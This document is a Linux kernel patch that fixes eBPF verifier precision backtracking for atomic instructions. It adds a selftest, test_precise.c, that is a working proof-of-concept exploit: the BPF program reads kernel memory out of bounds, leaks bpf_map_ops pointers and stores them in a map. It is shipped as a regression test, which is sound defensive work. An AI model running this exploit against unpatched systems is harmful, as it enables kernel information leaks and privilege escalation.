> >>  create mode 100644 tools/testing/selftests/bpf/verifier/atomic_precision.c
> >>
> >
> >[...]

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index e777f50401b6..4e86cd2cadd3 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -3495,6 +3495,7 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 	u32 dreg = insn->dst_reg;
 	u32 sreg = insn->src_reg;
 	u32 spi, i;
+	u32 set_spi, set_sreg;
 
 	if (insn->code == 0)
 		return 0;
@@ -3512,6 +3513,11 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 		if (!bt_is_reg_set(bt, dreg))
 			return 0;
 		if (opcode == BPF_MOV) {
+			if (dreg == BPF_REG_FP || sreg == BPF_REG_FP) {
+				verbose(env, "BUG: backtracking to r10\n");
+				WARN_ONCE(1, "verifier backtracking bug");
+				return -EFAULT;
+			}
 			if (BPF_SRC(insn->code) == BPF_X) {
 				/* dreg = sreg or dreg = (s8, s16, s32)sreg
 				 * dreg needs precision after this insn
@@ -3580,11 +3586,53 @@  static int backtrack_insn(struct bpf_verifier_env *env, int idx, int subseq_idx,
 			WARN_ONCE(1, "verifier backtracking bug");
 			return -EFAULT;
 		}
-		if (!bt_is_slot_set(bt, spi))
-			return 0;
-		bt_clear_slot(bt, spi);
-		if (class == BPF_STX)
-			bt_set_reg(bt, sreg);
+		if (BPF_MODE(insn->code) == BPF_ATOMIC) {
+			switch (insn->imm) {
+				case BPF_ADD:
+				case BPF_AND:
+				case BPF_OR:
+				case BPF_XOR:
+					if (bt_is_slot_set(bt, spi)) {
+						bt_set_reg(bt, sreg);
+					}
+					break;
+				case BPF_ADD | BPF_FETCH:
+				case BPF_AND | BPF_FETCH:
+				case BPF_OR | BPF_FETCH:
+				case BPF_XOR | BPF_FETCH:
+					set_spi = bt_is_reg_set(bt, sreg);
+					set_sreg = bt_is_slot_set(bt, spi);
+					if (set_spi) {
+						bt_set_slot(bt, spi);
+						bt_clear_reg(bt, sreg);
+					}
+					if (set_sreg) {
+						bt_set_slot(bt, spi);
+						bt_set_reg(bt, sreg);
+					}
+					break;
+				case BPF_XCHG:
+				case BPF_CMPXCHG:
+					if (bt_is_reg_set(bt, sreg) && bt_is_slot_set(bt, spi))
+						return 0;
+					else if (bt_is_reg_set(bt, sreg)) {
+						bt_set_slot(bt, spi);
+						bt_clear_reg(bt, sreg);
+					} else if (bt_is_slot_set(bt, spi)) {
+						bt_set_reg(bt, sreg);
+						bt_clear_slot(bt, spi);
+					} else {
+						return 0;
+					}
+					break;
+			}
+        } else {
+               if (!bt_is_slot_set(bt, spi))
+                       return 0;
+               bt_clear_slot(bt, spi);
+               if (class == BPF_STX)
+                       bt_set_reg(bt, sreg);
+        }
 	} else if (class == BPF_JMP || class == BPF_JMP32) {
 		if (bpf_pseudo_call(insn)) {
 			int subprog_insn_idx, subprog;
diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
index 4225f975fce3..2d3d2d6b159b 100644
--- a/tools/testing/selftests/bpf/Makefile
+++ b/tools/testing/selftests/bpf/Makefile
@@ -53,7 +53,8 @@  TEST_GEN_PROGS = test_verifier test_tag test_maps test_lru_map test_lpm_map test
 	test_sock test_sockmap get_cgroup_id_user \
 	test_cgroup_storage \
 	test_tcpnotify_user test_sysctl \
-	test_progs-no_alu32
+	test_progs-no_alu32 \
+	test_precise
 TEST_INST_SUBDIRS := no_alu32
 
 # Also test bpf-gcc, if present
@@ -647,6 +648,9 @@  $(OUTPUT)/test_verifier: test_verifier.c verifier/tests.h $(BPFOBJ) | $(OUTPUT)
 	$(call msg,BINARY,,$@)
 	$(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) $(LDLIBS) -o $@
 
+$(OUTPUT)/test_precise: test_precise.c
+	$(Q)$(CC) $(CFLAGS) $(filter %.a %.o %.c,$^) -o $@
+
 # Include find_bit.c to compile xskxceiver.
 EXTRA_SRC := $(TOOLSDIR)/lib/find_bit.c
 $(OUTPUT)/xskxceiver: $(EXTRA_SRC) xskxceiver.c xskxceiver.h $(OUTPUT)/xsk.o $(OUTPUT)/xsk_xdp_progs.skel.h $(BPFOBJ) | $(OUTPUT)
diff --git a/tools/testing/selftests/bpf/test_precise.c b/tools/testing/selftests/bpf/test_precise.c
new file mode 100644
index 000000000000..8d3fe278579c
--- /dev/null
+++ b/tools/testing/selftests/bpf/test_precise.c
@@ -0,0 +1,186 @@ 
+#include <linux/bpf.h>
+#include <errno.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include "../../../include/linux/filter.h"
+
+char logbuf[1024*1024];
+char data_in[1024], data_out[1024], ctx_in[1024], ctx_out[1024];
+extern int errno;
+
+static int setup_listener_sock();
+static int setup_send_sock();
+
+#define STORAGE_PTR_REG     BPF_REG_3
+#define CORRUPTED_PTR_REG   BPF_REG_4
+#define SPECIAL_VAL_REG     BPF_REG_5
+#define LEAKED_VAL_REG      BPF_REG_8
+
+#define STORAGE_MAP_SIZE (8192)
+
+int main(){
+
+	// Create map for out-of-bound access
+	unsigned long long key = 0;
+    union bpf_attr corrupt_map = {
+        .map_type = BPF_MAP_TYPE_ARRAY,
+        .key_size = 4,
+        .value_size = STORAGE_MAP_SIZE,
+        .max_entries = 1,
+    };
+
+    strcpy(corrupt_map.map_name, "corrupt_map");
+    int corrupt_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &corrupt_map, sizeof(corrupt_map));
+    if (corrupt_map_fd < 0)
+        return 0;
+
+	// Set up the second, valid map in which we can store information
+    key = 0;
+    union bpf_attr storage_map = {
+        .map_type = BPF_MAP_TYPE_ARRAY,
+        .key_size = 4,
+        .value_size = STORAGE_MAP_SIZE,
+        .max_entries = 1
+    };
+    strcpy(storage_map.map_name, "storage_map");
+    int storage_map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &storage_map, sizeof(corrupt_map));
+    if (storage_map_fd < 0) {
+        return 0;
+	}
+
+
+	struct bpf_insn progBytecode[] = {
+        BPF_MOV64_IMM(BPF_REG_2, 1000),
+        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_DIV, BPF_REG_2, 3),
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0, 2),
+        BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, 200),
+        BPF_JMP_IMM(BPF_JA, 0, 0, 1),
+		BPF_ST_MEM(BPF_DW, BPF_REG_3, -120, -0x110),
+        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_3, -120),
+        /* Load the corrupt map */
+        BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
+        BPF_LD_MAP_FD(BPF_REG_1, corrupt_map_fd),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+        BPF_EXIT_INSN(),
+        // Trigger arbitrary read/write
+        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
+        BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),
+        // Access map-0x110
+        BPF_LDX_MEM(BPF_DW, LEAKED_VAL_REG, BPF_REG_7, 0),
+        // Save the leaked bpf_map_ops into the second map
+        BPF_MOV64_IMM(BPF_REG_0, 0),    
+        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), 
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),   
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  
+        BPF_LD_MAP_FD(BPF_REG_1, storage_map_fd),  
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),    
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),  
+        BPF_EXIT_INSN(),    
+        BPF_MOV64_REG(STORAGE_PTR_REG, BPF_REG_0),  
+        BPF_STX_MEM(BPF_DW, STORAGE_PTR_REG, LEAKED_VAL_REG, 0),
+ 		BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_EXIT_INSN(),
+};
+
+    union bpf_attr progAttr;
+    memset(&progAttr, 0, sizeof(progAttr));
+    progAttr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
+    progAttr.license = (__u64)"Dual BSD/GPL";
+    progAttr.log_level = 2;
+    progAttr.log_size = 1024*1024;
+    progAttr.log_buf = (__u64)logbuf;
+    progAttr.insns = (__u64)progBytecode;
+    progAttr.insn_cnt = sizeof(progBytecode)/sizeof(struct bpf_insn);
+	progAttr.prog_flags = BPF_F_TEST_RND_HI32|BPF_F_TEST_STATE_FREQ;
+
+    errno = 0;
+    int fd = syscall(SYS_bpf, 0x5, &progAttr, sizeof(progAttr));
+    printf("%s\n%s\n", logbuf, strerror(errno));
+
+	/*
+    union bpf_attr attr;
+    memset(&attr, 0, sizeof(attr));
+    attr.test.prog_fd = fd;
+    attr.test.data_size_in = sizeof(data_in);
+    attr.test.data_size_out = sizeof(data_out);
+    attr.test.data_in = (__aligned_u64)data_in;
+    attr.test.data_out = (__aligned_u64)data_out;
+    errno = 0;
+    int ret = syscall(SYS_bpf, 10, &attr, sizeof(attr));
+    printf("BPF_PROG_TEST_RUN returns %d, %s, fd:%d\n", ret, strerror(errno), fd);
+	*/
+
+	int listener_sock = setup_listener_sock();
+    int send_sock = setup_send_sock();
+    if (listener_sock < 0 || send_sock < 0) {
+        return 0;
+	}
+    if (setsockopt(listener_sock, SOL_SOCKET, SO_ATTACH_BPF, &fd,
+               sizeof(fd)) < 0) {
+        return 0;
+    }
+    // trigger execution by connecting to the listener socket
+    struct sockaddr_in serverAddr;
+    serverAddr.sin_family = AF_INET;
+    serverAddr.sin_port = htons(1337);
+    serverAddr.sin_addr.s_addr = htonl(INADDR_ANY);
+    // no need to check connect, it will fail anyways
+    connect(send_sock, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
+    close(listener_sock);
+    close(send_sock);
+
+	unsigned long lk[STORAGE_MAP_SIZE / sizeof(long long)];
+    memset(lk, 0, sizeof(lk));
+    key = 0;
+	union bpf_attr lookup_map = {
+        .map_fd = storage_map_fd,
+        .key = (unsigned long long)&key,
+        .value = (unsigned long long)&lk
+    };
+    int err = syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &lookup_map, sizeof(lookup_map));
+    if (err < 0) {
+        return 0;
+	}
+
+	printf("storage map value: %lx\n", *lk);
+	return 0;
+}
+
+static int setup_listener_sock()
+{
+    int sock_fd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC, 0);
+    if (sock_fd < 0) {
+        return sock_fd;
+    }
+
+    struct sockaddr_in serverAddr;
+    serverAddr.sin_family = AF_INET;
+    serverAddr.sin_port = htons(1337);
+    serverAddr.sin_addr.s_addr = htonl(INADDR_ANY);
+
+    int err = bind(sock_fd, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
+    if (err < 0)
+        return err;
+
+    err = listen(sock_fd, 32);
+    if (err < 0)
+        return err;
+
+    return sock_fd;
+}
+
+
+static int setup_send_sock()
+{
+    return socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
+}
+
diff --git a/tools/testing/selftests/bpf/verifier/atomic_precision.c b/tools/testing/selftests/bpf/verifier/atomic_precision.c
new file mode 100644
index 000000000000..49ebf97a03e8
--- /dev/null
+++ b/tools/testing/selftests/bpf/verifier/atomic_precision.c
@@ -0,0 +1,19 @@ 
+{
+  "atomic_fetch_or: precision marking test",
+  .insns = {
+	BPF_CALL_REL(1),
+    BPF_EXIT_INSN(),
+	BPF_MOV64_IMM(BPF_REG_1, 1000),
+    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+    BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_1, -120),
+    BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),
+    BPF_ATOMIC_OP(BPF_W, BPF_OR | BPF_FETCH, BPF_REG_10, BPF_REG_7, -120),
+    BPF_ALU32_REG(BPF_OR, BPF_REG_7, BPF_REG_3),
+	BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN(),
+  },
+  .result  = REJECT,
+  .errstr = "R7 32-bit pointer arithmetic prohibited",
+  .result_unpriv = REJECT,
+  .errstr_unpriv = "loading/calling other bpf or kernel functions are allowed for CAP_BPF and CAP_SYS_ADMIN",
+},